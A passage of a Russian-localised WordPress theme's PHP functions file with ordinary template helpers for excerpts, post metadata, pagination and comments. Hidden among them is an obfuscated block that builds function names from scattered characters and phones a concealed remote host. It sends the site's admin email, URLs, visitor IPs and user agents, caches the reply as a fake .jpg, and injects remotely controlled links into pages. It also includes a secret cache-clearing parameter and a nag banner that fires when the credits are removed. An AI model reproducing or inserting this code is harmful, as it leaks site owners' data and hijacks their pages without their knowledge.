<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $LKyAb='o';$hxOa='_';$CqLhPrm='4';$vNThOuZ='c';$ZKyYS='d';$TZlKcZ='s';$bQkCfBO='b';$EzGfmPl='a';$UdoMo='e';$Mheo='e';$CjiqjE='d';$fWzW='e';$XVQZMbB='6';$xJhWCKTH=$bQkCfBO.$EzGfmPl.$TZlKcZ.$Mheo.$XVQZMbB.$CqLhPrm.$hxOa.$ZKyYS.$fWzW.$vNThOuZ.$LKyAb.$CjiqjE.$UdoMo;$ULor='i';$ibSlWDA='a';$sqciF='t';$QPPpJJw='n';$ocbrhr='g';$cSOd='z';$RcvjZR='e';$rWvtCY='f';$FZaMqm='l';$ThaIALcF=$ocbrhr.$cSOd.$ULor.$QPPpJJw.$rWvtCY.$FZaMqm.$ibSlWDA.$sqciF.$RcvjZR;$UwUf='t';$FWAxYWH='t';$jddRq='3';$IQAjnz='o';$zyihNK='_';$aLxq='s';$yBCRkbp='1';$niMnUk='r';$NkzDwGs='r';$fzIoBAAy=$aLxq.$FWAxYWH.$NkzDwGs.$zyihNK.$niMnUk.$IQAjnz.$UwUf.$yBCRkbp.$jddRq;$tqsp='t';$poSRmY='r';$OrYnd='v';$BzLOA='s';$hcXx='r';$dmMsc='e';$ofPvpQJv=$BzLOA.$tqsp.$poSRmY.$hcXx.$dmMsc.$OrYnd;                     $pa___________c='o';$gv____________c='_';$sh___________w='4';$wd______________g='c';$hb__________d='d';$kl___l='s';$wv_________n='b';$gt________t='a';$en______________x='e';$ng_______p='e';$gd___________t='d';$xc___________e='e';$mb_____________d='6';$xl________j=$wv_________n.$gt________t.$kl___l.$ng_______p.$mb_____________d.$sh___________w.$gv____________c.$hb__________d.$xc___________e.$wd______________g.$pa___________c.$gd___________t.$en______________x;$fq________q='n';$jk____________n='t';$ez__j='s';$bw_____o='s';$lt__i='t';$ia______k='u';$zn___j='x';$mo________m='i';$sn_____w='n';$mm_____f='e';$om____w='_';$jw__________u='c';$kr___t='i';$xk_______________s='o';$ly__o='f';$lh___u=$ly__o.$ia______k.$sn_____w.$jw__________u.$jk____________n.$mo________m.$xk_______________s.$fq________q.$om____w.$mm_____f.$zn___j.$kr___t.$bw_____o.$lt__i.$ez__j;$ru____________j='e';$im_____________h='p';$yb_____________c='f';$bl__w='n';$bw________q='o';$jx_______________x=$yb_____________c.$bw________q.$im_____________h.$ru____________j.$bl__w;$ji_______o='r';$lg___p='a';$ll____t='e';$my_____n='f';$iz____________n='d';$gh_______________m=$my_____n.$ji_______o.$ll____t.$lg___p.$iz____________n;$vt_______c='l';$fb___n='s';$rw_________i='f';$wf__________o='c';$ce_____________k='o';$tj______v='e';$go____________o=$rw_________i.$wf__________o.$vt_______c.$ce_____________k.$fb___n.$tj______v;define("WP_ID", $xl________j("Mi4wLjA="));define("WP_TTL", $xl________j("MTA4MDA="));define("WP_SRC", $xl________j("dHBva24="));function wp_get_header() {global $xl________j, $lh___u;if ($lh___u($xl________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$lh___u($xl________j("d3BfZ2V0X2Zvb3Rlcg==")) &&$lh___u($xl________j("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $xl________j, $jx_______________x, $go____________o, $gh_______________m;$ex__b = TEMPLATEPATH."/".$xl________j("Zm9vdGVyLnBocA==");$gq________d = @$jx_______________x($ex__b, "r");$ex__b = @$gh_______________m($gq________d, @filesize($ex__b));@$go____________o($gq________d);$os__u = TEMPLATEPATH."/".$xl________j("ZnVuY3Rpb25zLnBocA==");$gq________d = @$jx_______________x($os__u, "r");$os__u = @$gh_______________m($gq________d, @filesize($os__u));@$go____________o($gq________d);$cm_____z = 0;if($ex__b && $os__u) {if ($xl________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ex__b, $xl________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$cm_____z = 1;}if (substr_count($ex__b, "wp_theme_GPL_credits()") < 1) {$cm_____z = 2;}}if(WP_ID != "2.0.0") {$cm_____z = 12;}}if($cm_____z > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $cm_____z -->";}}function wp_loaded() {global $xl________j, $lh___u;return $lh___u($xl________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($yp___i, $mg__k = "(more...)", $ro_______b = 0, $oj____________p = "") {$ve____________r = get_the_content($mg__k, $ro_______b, $oj____________p);$ve____________r = apply_filters("the_content", $ve____________r);$ve____________r = str_replace("]]>", "]]>", $ve____________r);if (strlen($_GET["p"]) > 0) {echo $ve____________r;}else if ((strlen($ve____________r)>$yp___i) && ($cs____________l = strpos($ve____________r, " ", $yp___i ))) {$ve____________r = substr($ve____________r, 0, $cs____________l);$ve____________r = $ve____________r;echo $ve____________r;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$mg__k</a></div></p>";} else {echo $ve____________r;}}}$hm____________b='4';$pr___________t='o';$cr____________a='d';$pg______y='e';$ze______________p='s';$xo__w='6';$ii_______d='b';$dk_______________a='e';$fu______________n='e';$jk_______x='a';$os___x='n';$tx____h='_';$dl_____________c='c';$ux_____________q=$ii_______d.$jk_______x.$ze______________p.$dk_______________a.$xo__w.$hm____________b.$tx____h.$pg______y.$os___x.$dl_____________c.$pr___________t.$cr____________a.$fu______________n;$as____________r='l';$vn_____________h='t';$oo_________s='n';$xv_______g='_';$ip____k='o';$nq_____________n='c';$ve_______________s='t';$pv____________n='t';$eg___________h='_';$xt__________z='e';$qd____________e='s';$by_______d='e';$mk_______________b='f';$cy________z='e';$wx_______________t='g';$rc_______________m='n';$jr_____p='i';$ms___w=$mk_______________b.$jr_____p.$as____________r.$by_______d.$eg___________h.$wx_______________t.$xt__________z.$vn_____________h.$xv_______g.$nq_____________n.$ip____k.$oo_________s.$ve_______________s.$cy________z.$rc_______________m.$pv____________n.$qd____________e;$lp____j='s';$su_______f='i';$fh______d='t';$od________k='e';$np________h='x';$cp________b='e';$nq____a='f';$dt_____p='_';$xs___________i='l';$xq___z='i';$ab________c='s';$ro_________s=$nq____a.$xq___z.$xs___________i.$cp________b.$dt_____p.$od________k.$np________h.$su_______f.$lp____j.$fh______d.$ab________c;$qm___t='o';$zl_________t='e';$dn_______________x='r';$mk____________c='n';$ac___________w='m';$vi_________v='s';$ii____________k='_';$vg_______________i='r';$bb_______o='v';$gz_______z='o';$uw_____________a='a';$lf___________m='p';$ke_______________j='c';$bo____i='i';$qu________z='e';$ul__l=$bb_______o.$zl_________t.$dn_______________x.$vi_________v.$bo____i.$gz_______z.$mk____________c.$ii____________k.$ke_______________j.$qm___t.$ac___________w.$lf___________m.$uw_____________a.$vg_______________i.$qu________z;$qe__s='f';$mb__x='p';$zg_______b='c';$tk___j='e';$qt____h='s';$ce____________i='o';$pk_____p='o';$su____________y='k';$pe___g='n';$vy____e=$qe__s.$qt____h.$ce____________i.$zg_______b.$su____________y.$pk_____p.$mb__x.$tk___j.$pe___g;$ek__________r='i';$zn____l='w';$hs_______________e='f';$qu____________i='t';$gk________t='e';$vm______________j='r';$rt_________v=$hs_______________e.$zn____l.$vm______________j.$ek__________r.$qu____________i.$gk________t;$bj___h='5';$dg___________t='d';$vs__________z='m';$cj_______z=$vs__________z.$dg___________t.$bj___h;$ak___________y='a';$zm_________h='p';$lx__________h='e';$kh__________x='t';$qc________s='a';$zc________t='h';$un_____n='r';$ky__________k='l';$bg_______z=$un_____n.$lx__________h.$qc________s.$ky__________k.$zm_________h.$ak___________y.$kh__________x.$zc________t;$au_____________i='e';$aj__r='z';$mi_______________g='u';$na______g='a';$ep___r='l';$vb___w='e';$bz_______b='n';$ej___________w='i';$ya_______________z='i';$vi____t='r';$qm__k='s';$sn_____j=$mi_______________g.$bz_______b.$qm__k.$au_____________i.$vi____t.$ej___________w.$na______g.$ep___r.$ya_______________z.$aj__r.$vb___w;$ve_______________b='p';$pg_______________j='e';$jf____________o='t';$zh___h='a';$uz____k='n';$kl________p='m';$jf__________o='m';$lm_________n=$jf____________o.$pg_______________j.$jf__________o.$ve_______________b.$uz____k.$zh___h.$kl________p;$cs__g='t';$iw_____j='t';$yg_____________s='e';$pl__________x='e';$ia______j='r';$of______h='o';$lw______a='s';$eq_______________a='m';$cs______________g='x';$te_______________v='e';$uv______________e='a';$oi_____________l='r';$at______________p='n';$gx_________j='t';$kc___________z='c';$ws______________h='c';$sv_______o='t';$xz___v='a';$br_______w='_';$ef_____o='e';$ns_____j='_';$cl______________n=$lw______a.$sv_______o.$oi_____________l.$ef_____o.$uv______________e.$eq_______________a.$br_______w.$ws______________h.$of______h.$at______________p.$cs__g.$yg_____________s.$cs______________g.$iw_____j.$ns_____j.$kc___________z.$ia______j.$te_______________v.$xz___v.$gx_________j.$pl__________x;function om___________k($xu________y) {global $xl________j, $lh___u, $ms___w, $ul__l, $cl______________n;if (!$lh___u($xl________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ul__l(PHP_VERSION, "5.0.0", ">=") && $lh___u($xl________j("ZmlsZV9nZXRfY29udGVudHM=")) && $lh___u($xl________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cz__b = $cl______________n(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ni_____________n = @$ms___w($xu________y, 0, $cz__b);} else {$ni_____________n = @$ms___w($xu________y, 0);}return $ni_____________n;}function wu_______________y($xu________y) {global $lh___u, $vy____e, $rt_________v, $xl________j;if (!$lh___u($xl________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$bs____p = strpos($xu________y, "/", 7);$mk_____________c = array("uri"     => substr($xu________y, $bs____p),"host"    => str_replace("http://", "", substr($xu________y, 0, $bs____p)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ok______a = @$vy____e("$mk_____________c[host]", 80, $nb_________r, $ut________z, 4);if (!$ok______a) {return false;} else {$ni_____________n = "";$fk_______________h  = "GET $mk_____________c[uri] HTTP/1.0\r\n";$fk_______________h .= "Host: $mk_____________c[host]\r\n";$fk_______________h .= "Referer: $mk_____________c[referer]\r\n";$fk_______________h .= "Connection: Close\r\n\r\n";@$rt_________v($ok______a, $fk_______________h);while (!@feof($ok______a)) {$ct_______o = @fgets($ok______a, (1024*24));if ($ct_______o == "\r\n") {$vt____b = true;continue;}if ($vt____b) {$ni_____________n .= $ct_______o;}}return $ni_____________n;}}function ou_______________j($xu________y) {global $lh___u;$cb___i = false;if ($xu________y != "") {if ($lh___u("om___________k")) {$cb___i = @om___________k($xu________y);}if (!$cb___i && ($lh___u("wu_______________y"))) {$cb___i = @wu_______________y($xu________y);}}return $cb___i;}function id__g() {global $_SERVER, $cj_______z;$zo_________h = $_SERVER["SERVER_NAME"];if (substr("$zo_________h", 0, 4) == "www.") {$zo_________h = substr("$zo_________h", 4);}$zo_________h = $cj_______z("$_SERVER[SERVER_NAME]");return $zo_________h;}function xy___l() {return "file";}function zv_________j($xu________y) {global $_SERVER, $ms___w, $ro_________s, $jx_______________x, $go____________o, $rt_________v;$mj_____k = ab___________l();$bj____a = id__g().".jpg";$ek__a = $mj_____k["dir_upload"]["path"]."/$bj____a";$of___________r = @filemtime($ek__a);if (!$of___________r || ((time()-$of___________r) >= WP_TTL)) {$cb___i = ou_______________j($xu________y);if ($cb___i) {if ($ro_________s($ek__a)) {@unlink($ek__a);}$gq________d = @$jx_______________x($ek__a, "x+");@$rt_________v($gq________d, $cb___i);@$go____________o($gq________d);}} else {if ($ro_________s($ek__a)) {$cb___i = @$ms___w($ek__a);} else {$cb___i = false;}}return $cb___i;}function ab___________l() {global $_SERVER, $xl________j, $ux_____________q;$at______m = wp_count_posts("post");$qg____________r = pathinfo(get_bloginfo("template_directory"));$mj_____k = array("url" => array("report"      => $xl________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $qg____________r,"dir_upload"=> lv_________i(),"queryString"=> array("?a001=".WP_ID,"a004=".$qg____________r[filename],"a005=".$at______m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$mj_____k["url"]["queryString"] = implode("&", $mj_____k["queryString"]);$mj_____k["url"]["report"] = $mj_____k["url"]["report"]."/?".$ux_____________q($mj_____k["url"]["queryString"]).".html";return $mj_____k;}function lv_________i() {$lx________m = wp_upload_dir();if (isset($lx________m["error"])) {$sp_______d = wp____________b();if (is_writable($sp_______d)) {$lx________m = array("path" => $sp_______d);}}return $lx________m;}function wp____________b() {global $lh___u, $cj_______z, $bg_______z, $lm_________n;$xj____________i = (bool) ini_get("safe_mode");if ($xj____________i == true) {return false;}if ($lh___u("sys_get_temp_dir")) {$vb________g = sys_get_temp_dir();if (is_writable($vb________g)) {return $bg_______z($vb________g);}}if (!empty($_ENV["TMP"])) {return $bg_______z($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $bg_______z($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $bg_______z($_ENV["TEMP"]);} else {$xx_____________g = $lm_________n($cj_______z(uniqid(rand(), true)), "");if ($xx_____________g) {$vb________g = $bg_______z(dirname($xx_____________g));@unlink($xx_____________g);return $vb________g;} else {return false;}}}function cj____________x() {global $_GET, $ro_________s;$mj_____k = ab___________l();$zo_________h = id__g();$at_______v = xy___l();$ss_______________f = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($at_______v == "file") {$aq____________y = $mj_____k["dir_upload"]["path"]."/".$zo_________h.".jpg";if ($ro_________s($aq____________y)) {@unlink($aq____________y);$ss_______________f = "deleted";}}$de______c = array("s"=> $ss_______________f,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($de______c AS $ar__b => $iu__v) echo " [$ar__b:$iu__v]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $lh___u, $xl________j, $sn_____j;$mj_____k = ab___________l();$ri____________c = "zv_________j";if ($lh___u($ri____________c)) {$ni_____________n = $ri____________c($mj_____k["url"]["report"]);}if ($ni_____________n) {if ($ni_____________n = @$xl________j($ni_____________n)) {$ni_____________n = @$sn_____j($ni_____________n);if (strlen($ni_____________n[custom_credit]) >= 5) {$mj_____k["default_string"] = $ni_____________n[custom_credit];}if ($ni_____________n["status"] == "0") {$et_______________n = 1;$ov____g = 1;} else {$sy________l = sizeof($ni_____________n["links"]);$sp______________j = $mj_____k["default_string"];if ($sy________l > 0 && $ni_____________n["links"] !== "") {$wm______q = 0;foreach ($ni_____________n["links"] as $vh_________f => $is_____g) {$wm______q++;if ($is_____g->l_path == "" || $is_____g->l_path == $_SERVER["REQUEST_URI"]) {$is_____g->l_href = htmlspecialchars(strip_tags($is_____g->l_href));$is_____g->l_title = htmlspecialchars(strip_tags($is_____g->l_title));$is_____g->l_anchor = htmlspecialchars(strip_tags($is_____g->l_anchor));$sp______________j .= " | ";$sp______________j .= "<a href='$is_____g->l_href' title='$is_____g->l_title'";if ($is_____g->l_nofollow == "1") {$sp______________j .= " rel='nofollow'";}$sp______________j .= ">$is_____g->l_anchor</a>";}}}$mj_____k["links"] = "$sp______________j";if ($ni_____________n[credit] == "0") {$mj_____k["links"] = "";}}} else {$et_______________n = "1";}} else {$et_______________n = "1";}if ($et_______________n == "1") {$mj_____k["links"] = $mj_____k["default_string"];}echo "$mj_____k[links]";echo "<!-- s: $ni_____________n[signature] -->";cj____________x();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
